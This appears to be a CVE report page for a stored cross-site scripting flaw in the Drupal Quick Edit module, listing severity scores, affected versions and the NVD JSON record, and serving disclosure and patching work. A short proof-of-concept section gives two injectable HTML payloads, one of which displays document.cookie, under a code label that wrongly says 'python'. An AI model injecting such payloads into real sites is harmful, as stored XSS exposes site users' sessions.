Security Vulnerability Report
中文
CVE-2026-2348 CVSS 5.4 MEDIUM

CVE-2026-2348

Published: 2026-03-25 16:16:22
Last Modified: 2026-04-02 20:41:01

Description

Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Quick Edit allows Cross-Site Scripting (XSS).This issue affects Quick Edit: from 0.0.0 before 1.0.5, from 2.0.0 before 2.0.1.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wim-leers:quick_edit:*:*:*:*:*:drupal:*:* - VULNERABLE
cpe:2.3:a:wim-leers:quick_edit:2.0.0:*:*:*:*:drupal:*:* - VULNERABLE
Quick Edit < 1.0.5
Quick Edit >= 2.0.0, < 2.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-2348: Stored XSS in Drupal Quick Edit --> <!-- Inject the following payload into a Quick Edit enabled text field --> <svg/onload=alert('CVE-2026-2348_XSS')> <!-- Alternatively, using an image tag to trigger the script --> <img src=x onerror=alert(document.cookie)>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2348", "sourceIdentifier": "[email protected]", "published": "2026-03-25T16:16:21.517", "lastModified": "2026-04-02T20:41:01.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (\"Cross-site Scripting\") vulnerability in Drupal Quick Edit allows Cross-Site Scripting (XSS).This issue affects Quick Edit: from 0.0.0 before 1.0.5, from 2.0.0 before 2.0.1."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web (cross-site scripting) vulnerabilidad en Drupal Quick Edit permite cross-site scripting (XSS). Este problema afecta a Quick Edit: desde 0.0.0 antes de 1.0.5, desde 2.0.0 antes de 2.0.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wim-leers:quick_edit:*:*:*:*:*:drupal:*:*", "versionEndExcluding": "1.0.5", "matchCriteriaId": "0112205D-A715-4F4F-A0A9-8B5D56E38132"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wim-leers:quick_edit:2.0.0:*:*:*:*:drupal:*:*", "matchCriteriaId": "D0966B64-537B-40DA-9CAE-411915832BD4"}]}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2026-009", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}